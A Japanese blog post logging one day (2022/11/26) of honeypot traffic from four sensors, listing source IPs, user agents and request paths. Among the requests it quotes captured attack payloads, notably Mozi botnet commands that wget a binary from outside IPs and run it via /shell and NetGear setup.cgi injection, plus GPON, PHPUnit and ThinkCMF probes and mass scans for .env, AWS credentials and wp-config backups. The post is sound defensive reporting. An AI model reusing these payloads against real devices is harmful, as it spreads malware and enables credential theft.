2022/11/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/11/26分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
.jsへのスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為

を確認しました。

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
ZmEuによるスキャン行為
node-fetchによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://171.123.13.198:36601/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：104 (前日比：-132)
US：総アクセス数：101 (前日比：-27)
UK：総アクセス数：113 (前日比：21)
SG：総アクセス数：1230 (前日比：971)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.122.106.253	United States
27	34.223.100.15	United States
18	45.33.108.188	United States
2	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
1	65.49.20.85	United States
1	66.175.213.4	United States
1	72.251.235.148	United States
2	72.251.235.152	United States
1	79.110.62.92	Bulgaria
5	95.214.235.205	Ukraine
1	103.41.37.75	India
2	109.237.97.180	Russia
1	122.114.76.100	China
16	135.125.246.110	France
2	141.255.166.2	Panama
1	152.32.143.177	Hong Kong
1	161.35.213.88	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	178.72.78.222	Russia
4	183.136.225.32	China
1	185.66.88.47	Ukraine
1	185.106.122.182	United Arab Emirates
1	185.246.221.138	Bulgaria
4	185.254.196.115	Ukraine
1	192.241.206.58	United States
1	192.241.208.113	United States
1	198.235.24.145	United States
1	198.235.24.162	United States
1	205.185.121.69	United States

UserAgent一覧

件数	UserAgent
15	`-`
15	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
28	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 zgrab/0.x`
9	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
1	`Report Runner`
1	`msnbot/0.11 ( http[:]//search[.]msn[.]com/msnbot.htm)`
1	`python-requests/2.25.1`
3	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`HELP`
1		`\x16\x03\x01\x01H\x01`
11		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
29	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/2018/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/2019/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/api/search?folderIds=0`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/blog/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/cms/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fpbx/recordings/index.php`	HTTP/1.0
1	GET	`/html/admin/config.php`	HTTP/1.0
1	GET	`/html/recordings/index.php`	HTTP/1.0
2	GET	`/info.php`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/media/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/news/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s/53e20323e2937313e28313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]41[.]37[.]75:58842/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shop/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/site/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/sito/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	PUT	`/api/v2/cmdb/system/admin/admin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	45.79.128.205	United States
1	45.79.181.94	United States
2	45.79.181.104	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
5	50.31.21.8	United States
17	54.37.79.75	France
1	59.92.40.122	India
1	66.175.213.4	United States
1	66.240.205.34	United States
4	71.6.146.186	United States
1	72.251.235.148	United States
1	74.82.47.4	United States
1	85.31.44.156	Bulgaria
6	106.75.80.67	China
6	117.187.173.3	China
6	141.255.166.2	Panama
2	146.190.111.238	United States
1	152.32.150.67	Hong Kong
1	152.32.245.19	Hong Kong
2	152.89.196.211	Russia
2	159.65.125.47	United States
2	159.223.164.187	United States
2	162.142.125.219	United States
1	164.92.250.128	United States
1	167.71.185.251	United States
2	167.248.133.119	United States
2	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
2	173.214.175.178	United States
4	183.136.225.32	China
1	185.66.88.47	Ukraine
3	185.106.122.182	United Arab Emirates
3	185.246.221.138	Bulgaria
8	185.254.196.223	Ukraine
1	192.155.90.118	United States
1	192.241.212.107	United States
1	195.178.120.116	Bulgaria
1	198.235.24.36	United States

UserAgent一覧

件数	UserAgent
29	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 8_1) AppleWebKit/571.50 (KHTML, like Gecko) Chrome/77.0.923 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2_2) AppleWebKit/598.45 (KHTML, like Gecko) Chrome/103.0.1530 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 9_0_2) AppleWebKit/550.44 (KHTML, like Gecko) Chrome/103.0.2929 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1_2) AppleWebKit/559.35 (KHTML, like Gecko) Chrome/63.0.317 Safari/537.36`
6	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
7	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 8_2_2; Win64; x64) AppleWebKit/577.52 (KHTML, like Gecko) Chrome/98.0.2709 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 9_0_2; Win64; x64) AppleWebKit/568.35 (KHTML, like Gecko) Chrome/74.0.2129 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0`
12	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
1		`Gh0st\xad`
21		`\x16\x03\x01`
1	CONNECT	`cloudflare[.]com:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/axis2-admin/`	HTTP/1.1
2	GET	`/axis2/`	HTTP/1.1
2	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
10	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/html/admin/config.php`	HTTP/1.0
1	GET	`/nmaplowercheck1669353951`	HTTP/1.1
5	GET	`/robots.txt`	HTTP/1.1
3	GET	`/sitemap.xml`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
12	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
10	3.239.116.22	United States
1	45.33.80.243	United States
1	45.79.172.21	United States
2	45.79.181.94	United States
1	45.79.181.223	United States
23	51.79.29.48	Canada
1	51.120.3.88	United Kingdom
2	54.37.79.75	France
1	65.49.20.112	United States
1	66.175.213.4	United States
1	66.240.205.34	United States
1	72.251.235.148	United States
2	72.251.235.152	United States
1	85.31.44.156	Bulgaria
1	85.31.44.178	Bulgaria
1	103.133.105.200	Vietnam
2	109.237.98.226	Russia
2	124.223.2.56	China
6	141.255.166.2	Panama
3	152.89.196.211	Russia
2	159.89.127.41	United States
2	162.142.125.219	United States
2	162.142.125.220	United States
2	162.142.125.222	United States
1	165.232.149.87	United States
1	167.71.185.251	United States
2	167.94.138.45	United States
2	167.94.138.119	United States
2	167.94.145.57	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.105.89.161	United States
1	172.105.128.13	United States
2	173.214.175.178	United States
4	183.136.225.32	China
1	185.66.88.47	Ukraine
2	185.106.122.182	United Arab Emirates
2	185.180.143.141	Portugal
4	185.246.221.138	Bulgaria
8	185.254.196.223	Ukraine
1	192.155.90.118	United States
2	192.155.90.220	United States
1	192.241.200.33	United States
1	192.241.206.199	United States
1	198.199.94.162	United States
1	198.235.24.180	United States

UserAgent一覧

件数	UserAgent
32	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36`
36	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
12	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
6	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
3	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`MGLNDD_132.145.66.34_80\n`
1		`\x16\x03\x01\x01H\x01`
20		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`cloudflare[.]com:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
36	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/99vt`	HTTP/1.1
1	GET	`/99vu`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/aaaaaaaaaaaaaaaaaaaaaaaaaqr`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
11	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fpbx/recordings/index.php`	HTTP/1.0
1	GET	`/html/admin/config.php`	HTTP/1.0
1	GET	`/html/recordings/index.php`	HTTP/1.0
1	GET	`/index.php`	HTTP/1.1
1	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
2	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
12	POST	`/boaform/admin/formLogin`	HTTP/1.1
6	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1146	18.185.78.59	United States
1	20.13.128.149	United States
1	27.45.92.235	China
1	45.79.172.21	United States
1	45.79.181.94	United States
1	45.79.181.179	United States
1	45.79.181.223	United States
2	45.79.181.251	United States
17	54.37.79.75	France
2	62.233.50.179	Russia
1	65.49.20.105	United States
1	66.175.213.4	United States
1	72.251.235.148	United States
2	72.251.235.152	United States
1	85.31.44.178	Bulgaria
2	128.199.63.178	United Kingdom
4	141.255.166.2	Panama
5	152.89.196.211	Russia
1	159.65.161.190	United States
2	162.142.125.8	United States
6	164.92.195.113	United States
2	164.92.250.128	United States
2	167.94.138.44	United States
1	171.123.13.198	China
3	172.104.11.34	United States
1	172.105.89.161	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
2	173.214.175.178	United States
2	178.62.39.78	United States
2	179.43.187.234	Panama
1	185.66.88.47	Ukraine
2	185.106.122.182	United Arab Emirates
3	185.246.221.138	Bulgaria
1	192.241.197.213	United States
1	192.241.201.218	United States
1	192.241.212.202	United States
1	192.241.212.249	United States
2	193.56.29.167	United Kingdom
1	205.210.31.8	United States
1	205.210.31.141	United States

UserAgent一覧

件数	UserAgent
28	`-`
2	`Go-http-client/1.1`
1	`Hello, world`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1146	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:45.9) Gecko/20100101 Goanna/3.2 Firefox/45.9 PaleMoon/27.4.0`
17	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0`
9	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
6	`ZmEu`
1	`node-fetch/1.0 (+https[:]//github[.]com/bitinn/node-fetch)`
3	`xfa1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
2		`\x03`
1		`\x16\x03\x01\x02`
18		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1	CONNECT	`cloudflare[.]com:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	CONNECT	`proxy[.]korsangazi[.]com:443`	HTTP/1.1
6	GET	`/.aws/credentials`	HTTP/1.1
6	GET	`/.config/gatsby/config.json`	HTTP/1.1
6	GET	`/.cordova/config.json`	HTTP/1.1
6	GET	`/.deployment-config.json`	HTTP/1.1
6	GET	`/.docker/.env`	HTTP/1.1
6	GET	`/.docker/config.json`	HTTP/1.1
6	GET	`/.docker/daemon.json`	HTTP/1.1
6	GET	`/.docker/laravel/app/.env`	HTTP/1.1
6	GET	`/.env.backup`	HTTP/1.1
6	GET	`/.env.bak`	HTTP/1.1
6	GET	`/.env.dev`	HTTP/1.1
6	GET	`/.env.development.local`	HTTP/1.1
6	GET	`/.env.dist`	HTTP/1.1
6	GET	`/.env.docker.dev`	HTTP/1.1
6	GET	`/.env.local`	HTTP/1.1
6	GET	`/.env.php`	HTTP/1.1
6	GET	`/.env.prod`	HTTP/1.1
6	GET	`/.env.production.local`	HTTP/1.1
6	GET	`/.env.sample.php`	HTTP/1.1
6	GET	`/.env.save`	HTTP/1.1
6	GET	`/.env.stage`	HTTP/1.1
6	GET	`/.env.test.localapi/.env`	HTTP/1.1
6	GET	`/.env.test`	HTTP/1.1
25	GET	`/.env`	HTTP/1.1
6	GET	`/.environment`	HTTP/1.1
6	GET	`/.envrc`	HTTP/1.1
6	GET	`/.envs`	HTTP/1.1
6	GET	`/.env~`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
6	GET	`/.git/config`	HTTP/1.1
6	GET	`/.gitlab-ci/.env`	HTTP/1.1
6	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
6	GET	`/.lanproxy/config.json`	HTTP/1.1
6	GET	`/.msmtprc`	HTTP/1.1
6	GET	`/.s3cfg`	HTTP/1.1
6	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`/ReportServer`	HTTP/1.1
6	GET	`/_profiler/phpinfo`	HTTP/1.1
24	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
6	GET	`/admin/.env`	HTTP/1.1
6	GET	`/admin/wp-config..php.back`	HTTP/1.1
6	GET	`/admin/wp-config.php-backup`	HTTP/1.1
6	GET	`/admin/wp-config.php.backup`	HTTP/1.1
6	GET	`/admin/wp-config.php.bak`	HTTP/1.1
6	GET	`/admin/wp-config.php.bakup`	HTTP/1.1
6	GET	`/admin/wp-config.php.bck`	HTTP/1.1
6	GET	`/admin/wp-config.php.conf`	HTTP/1.1
6	GET	`/admin/wp-config.php.copy`	HTTP/1.1
6	GET	`/admin/wp-config.php.core`	HTTP/1.1
6	GET	`/admin/wp-config.php.dat`	HTTP/1.1
6	GET	`/admin/wp-config.php.db`	HTTP/1.1
6	GET	`/admin/wp-config.php.default`	HTTP/1.1
6	GET	`/admin/wp-config.php.ini`	HTTP/1.1
6	GET	`/admin/wp-config.php.jar`	HTTP/1.1
6	GET	`/admin/wp-config.php.old`	HTTP/1.1
12	GET	`/admin/wp-config.php.orig`	HTTP/1.1
6	GET	`/admin/wp-config.php.pas`	HTTP/1.1
6	GET	`/admin/wp-config.php.sav`	HTTP/1.1
6	GET	`/admin/wp-config.php.save`	HTTP/1.1
6	GET	`/admin/wp-config.php.saved`	HTTP/1.1
6	GET	`/admin/wp-config.php.tar.gz`	HTTP/1.1
6	GET	`/admin/wp-config.php.tar`	HTTP/1.1
6	GET	`/admin/wp-config.php.temp`	HTTP/1.1
6	GET	`/admin/wp-config.php.test`	HTTP/1.1
6	GET	`/admin/wp-config.php.tgz`	HTTP/1.1
6	GET	`/admin/wp-config.php.tmp`	HTTP/1.1
6	GET	`/admin/wp-config.php.txt`	HTTP/1.1
6	GET	`/admin/wp-config.php.war`	HTTP/1.1
6	GET	`/admin/wp-config.php.zip`	HTTP/1.1
6	GET	`/admin/wp-config.php~`	HTTP/1.1
6	GET	`/admin/wp-config.sav`	HTTP/1.1
6	GET	`/app/config.yml`	HTTP/1.1
6	GET	`/app/config/parameters.yml`	HTTP/1.1
6	GET	`/asdf.php`	HTTP/1.1
6	GET	`/beta/.env`	HTTP/1.1
6	GET	`/config.env`	HTTP/1.1
6	GET	`/config.js`	HTTP/1.1
6	GET	`/config.json`	HTTP/1.1
6	GET	`/config/config.js`	HTTP/1.1
6	GET	`/config/config.json`	HTTP/1.1
6	GET	`/config/secrets.yml`	HTTP/1.1
6	GET	`/console/base/config.json`	HTTP/1.1
6	GET	`/console/payments/config.json`	HTTP/1.1
6	GET	`/dashboard/phpinfo.php`	HTTP/1.1
6	GET	`/database.yml`	HTTP/1.1
6	GET	`/debug/default/view?panel=config`	HTTP/1.1
6	GET	`/env.backup`	HTTP/1.1
6	GET	`/env.config.js`	HTTP/1.1
6	GET	`/env.js`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fpbx/recordings/index.php`	HTTP/1.0
6	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/html/admin/config.php`	HTTP/1.0
1	GET	`/html/recordings/index.php`	HTTP/1.0
6	GET	`/i.php`	HTTP/1.1
6	GET	`/index.js`	HTTP/1.1
6	GET	`/index.json`	HTTP/1.1
6	GET	`/info.json`	HTTP/1.1
6	GET	`/info.php`	HTTP/1.1
6	GET	`/infophp.php`	HTTP/1.1
6	GET	`/infos.php`	HTTP/1.1
6	GET	`/js/config.js`	HTTP/1.1
6	GET	`/js/envConfig.js`	HTTP/1.1
6	GET	`/kyc/.env`	HTTP/1.1
6	GET	`/laravel/.env`	HTTP/1.1
6	GET	`/laravel/core/.env`	HTTP/1.1
6	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
6	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/myadmin/scripts/setup.php`	HTTP/1.1
6	GET	`/old_phpinfo.php`	HTTP/1.1
6	GET	`/package.js`	HTTP/1.1
6	GET	`/package.json`	HTTP/1.1
6	GET	`/php-info.php`	HTTP/1.1
6	GET	`/php.ini`	HTTP/1.1
6	GET	`/php.php`	HTTP/1.1
1	GET	`/phpMyAdmin/scripts/setup.php`	HTTP/1.1
6	GET	`/phpinfo.php`	HTTP/1.1
6	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpmyadmin/scripts/setup.php`	HTTP/1.1
6	GET	`/phpversion.php`	HTTP/1.1
6	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/pma/scripts/setup.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
6	GET	`/prod/.env`	HTTP/1.1
6	GET	`/public/.env`	HTTP/1.1
6	GET	`/secrets.yml`	HTTP/1.1
6	GET	`/server/config.json`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//171[.]123[.]13[.]198:36601/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
6	GET	`/temp.php`	HTTP/1.1
6	GET	`/test.php`	HTTP/1.1
6	GET	`/time.php`	HTTP/1.1
6	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/w00tw00t.at.blackhats.romanian.anti-sec:)`	HTTP/1.1
6	GET	`/wp-config..php.back`	HTTP/1.1
6	GET	`/wp-config.php-backup`	HTTP/1.1
6	GET	`/wp-config.php.backup`	HTTP/1.1
6	GET	`/wp-config.php.bak`	HTTP/1.1
6	GET	`/wp-config.php.bakup`	HTTP/1.1
6	GET	`/wp-config.php.bck`	HTTP/1.1
6	GET	`/wp-config.php.conf`	HTTP/1.1
6	GET	`/wp-config.php.copy`	HTTP/1.1
6	GET	`/wp-config.php.core`	HTTP/1.1
6	GET	`/wp-config.php.dat`	HTTP/1.1
6	GET	`/wp-config.php.db`	HTTP/1.1
6	GET	`/wp-config.php.default`	HTTP/1.1
6	GET	`/wp-config.php.ini`	HTTP/1.1
6	GET	`/wp-config.php.jar`	HTTP/1.1
6	GET	`/wp-config.php.old`	HTTP/1.1
12	GET	`/wp-config.php.orig`	HTTP/1.1
